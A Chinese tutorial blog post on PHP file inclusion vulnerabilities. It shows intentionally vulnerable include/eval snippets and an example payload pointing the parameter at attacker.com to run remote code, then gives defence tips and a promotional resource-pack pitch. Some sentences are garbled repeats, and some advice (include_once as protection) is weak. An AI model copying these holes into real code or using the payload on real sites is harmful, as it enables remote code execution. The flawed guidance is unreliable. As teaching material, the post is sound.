什么是文件包含漏洞?文件包含漏洞利用方法及防御技巧

于 2024-03-22 17:00:00 发布
阅读量1.6k 收藏 38
点赞数 25
文章标签: 安全 web安全 网络 php 学习 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75362610/article/details/136879963
版权
文章目录
    • 文件包含漏洞
    • 文件包含漏洞利用方法
    • 如何预防文件包含漏洞
    • 文件包含漏洞防御技巧
    • 网安学习路线

文件包含漏洞

文件包含漏洞是指在程序执行过程中,将外部文件的内容作为程序代码或数据的一部分来执行或使用,从而导致程序行为异常。攻击者可以利用文件包含漏洞在目标系统上执行任意代码,从而控制系统。
在这里插入图片描述

文件包含漏洞利用方法

文件包含漏洞的利用方法有很多种,其中最常见的一种方法是使用“包含”函数。在PHP中,可以使用“include”和“require”函数来包含外部文件。如果攻击者能够控制包含的文件的内容,那么他们就可以在目标系统上执行任意代码。

例如,以下代码演示了如何利用文件包含漏洞来执行任意代码:

<?php
if (isset($_GET['file'])) {
  include $_GET['file'];
}
?>

如果攻击者能够控制 G E T [ ′ f i l e ′ ] 的值,那么他们就可以在目标系统上包含任意文件。例如,攻击者可以将 _GET[‘file’]的值,那么他们就可以在目标系统上包含任意文件。例如,攻击者可以将 G​ET[′file′]的值,那么他们就可以在目标系统上包含任意文件。例如,攻击者可以将_GET[‘file’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。

另一种利用文件包含漏洞的方法是使用“URL包含”。在PHP中,可以使用“file_get_contents”函数来从URL获取内容。如果攻击者能够控制URL的内容,那么他们就可以在目标系统上执行任意代码。

例如,以下代码演示了如何利用URL包含漏洞来执行任意代码:

<?php
$file = file_get_contents($_GET['url']);
eval($file);
?>

如果攻击者能够控制 G E T [ ′ u r l ′ ] 的值,那么他们就可以在目标系统上从任意 U R L 获取内容。例如,攻击者可以将 _GET[‘url’]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将 G​ET[′url′]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将_GET[‘url’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。

在这里插入图片描述

如何预防文件包含漏洞

为了预防文件包含漏洞,可以采取以下措施:

  • 使用白名单机制来控制包含的文件。只允许包含来自受信任来源的文件。
  • 使用黑名单机制来禁止包含某些文件。
  • 使用严格的文件权限来防止非授权用户访问包含的文件。
  • 使用代码审查工具来检查代码中是否存在文件包含漏洞。
  • 使用Web应用程序防火墙来阻止攻击者利用文件包含漏洞。

文件包含漏洞防御技巧

  1. 使用安全的文件包含函数。

    • 使用 include_once()require_once() 函数来包含文件,而不是 include()require()。这将防止文件被包含多次,从而降低文件包含漏洞的风险。
    • 使用 __DIR__ 魔术常数来指定要包含的文件的路径。这将防止攻击者通过操纵文件路径来包含恶意文件。

  2. 验证用户输入。

    • 在包含文件之前,验证用户输入是否是有效的。这将防止攻击者通过提交恶意文件来触发文件包含漏洞。
    • 您可以使用以下方法来验证用户输入:
      • 使用正则表达式来检查用户输入是否符合预期的格式。
      • 使用白名单来限制用户只能包含某些特定的文件。
      • 使用黑名单来禁止用户包含某些特定的文件。

  3. 限制文件包含的范围。

    • 仅允许用户包含位于特定目录中的文件。这将防止攻击者通过包含位于其他目录中的恶意文件来触发文件包含漏洞。
    • 您可以使用 PHP 的 open_basedir 配置指令来限制文件包含的范围。

  4. 使用沙箱。

    • 在包含用户提交的文件之前,将其放在沙箱中。这将防止恶意文件对您的 Web 应用程序造成损害。
    • 您可以使用以下方法来创建沙箱:
      • 使用 PHP 的 proc_open() 函数来创建一个新的进程。
      • 使用 PHP 的 chroot() 函数来改变当前进程的根目录。

  5. 监视您的 Web 应用程序。

    • 监视您的 Web 应用程序,以便您能够快速检测到任何可疑的活动。
    • 您可以使用以下方法来监视您的 Web 应用程序:
      • 使用日志文件来记录所有可疑的活动。
      • 使用入侵检测系统 (IDS) 来检测可疑的网络活动。
      • 使用 Web 应用防火墙 (WAF) 来阻止恶意请求。

这里我整合并且整理成了一份【282G】的网络安全/红客技术从零基础入门到进阶资料包,需要的小伙伴文末免费领取哦,无偿分享!!!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以V扫描下方二维码联系领取~

1️⃣零基础入门

学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

需要详细路线图的,下面获取

路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
工具

视频

image1

书籍

image2

资源较为敏感,未展示全面,需要的下面获取

3️⃣面试集锦

面试资料

在这里插入图片描述在这里插入图片描述

简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

------ 🙇‍♂️ 本文转自网络,如有侵权,请联系删除 🙇‍♂️ ------

酒酿小小丸子
关注
  • 25
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞全面详解
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞——实例
weixin_54055099的博客
09-24 2904
文件包含漏洞的实例
文件包含漏洞利用
qq_56327824的博客
04-27 3057
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
文件包含漏洞全解
2301_78287784的博客
06-15 912
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
文件包含漏洞
qz362228的博客
04-23 1026
文章目录前言一、文件包含漏洞原理二、利用方式三、常用的防御方式四、绕过方式LFI漏洞利用技巧1.字符串截断--00截断2.配合文件上传总结 前言 一、文件包含漏洞原理 原理: 在通过PHP的相应函数(如:include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 (这可能有点难理解,那我们先来了解一下包含的概念,进而理解此原理) 1.什么是文件包含文件包含就是把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用
如何对照文件格式文档?文件漏洞分析中定位文件字段的方法
10-01
主要为大家介绍了文件漏洞分析中定位文件字段的方法,如何对照文件格式文档,调试分析程序中正在解析的是什么结构?这里总结了几点方法,需要的朋友可以参考下
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
计算机网络安全中文件上传漏洞防御措施.pdf
09-19
计算机网络安全中文件上传漏洞防御措施 计算机网络安全中文件上传漏洞是一种常见的Web安全漏洞,攻击者可以通过上传恶意代码的文件来获取服务器的控制权。为了防御这种攻击,需要对文件上传进行严格的校验检测,...
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定...
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
一文详解文件包含漏洞
MachineGunJoe666
06-10 1760
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
网络安全文件包含漏洞及其防护
Scalzdp的专栏
11-10 526
文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。举个例子,PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。接下来我们来看一下文件包含漏洞产生的原理。
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3030
渗透测试-文件包含漏洞以及php伪协议的应用
PHP文件包含漏洞总结
坚持硬核
10-07 3133
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1650
php文件包含漏洞--思路+例题讲解
什么是文件上传漏洞
最新发布
02-20
文件上传漏洞是一种常见的网络安全漏洞,它允许攻击者将恶意文件上传到目标服务器上。这种漏洞通常存在于Web应用程序中,攻击者可以通过绕过应用程序的文件上传验证机制,将恶意文件上传到服务器上,并在后续的攻击中执行该文件。 文件上传漏洞可能导致以下安全问题: 1. 执行恶意代码:攻击者可以上传包含恶意代码的文件,如Webshell(用于远程控制服务器)、木马程序等。一旦成功执行,攻击者可以获取服务器的控制权,进而进行其他恶意活动。 2. 数据泄露:攻击者可以上传包含敏感信息的文件,如数据库备份文件、配置文件等。这些文件可能包含用户名、密码、API密钥等敏感信息,一旦泄露,可能导致严重的安全后果。 3. 服务器资源滥用:攻击者可以上传大型文件或大量文件,导致服务器资源被滥用,如磁盘空间耗尽、带宽消耗等,从而影响正常的服务运行。 为了防止文件上传漏洞的发生,开发人员应该采取以下措施: 1. 文件类型验证:限制上传文件的类型和扩展名,只允许上传安全的文件类型。 2. 文件内容验证:检查上传文件的内容,确保其符合预期的格式和结构。 3. 文件名处理:对上传文件的文件名进行过滤和处理,防止恶意文件名的利用。 4. 文件存储位置:将上传的文件存储在安全的位置,并设置适当的访问权限,防止恶意文件的执行。 5. 安全配置:确保服务器和应用程序的安全配置,如禁用不必要的文件上传功能、限制上传文件大小等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值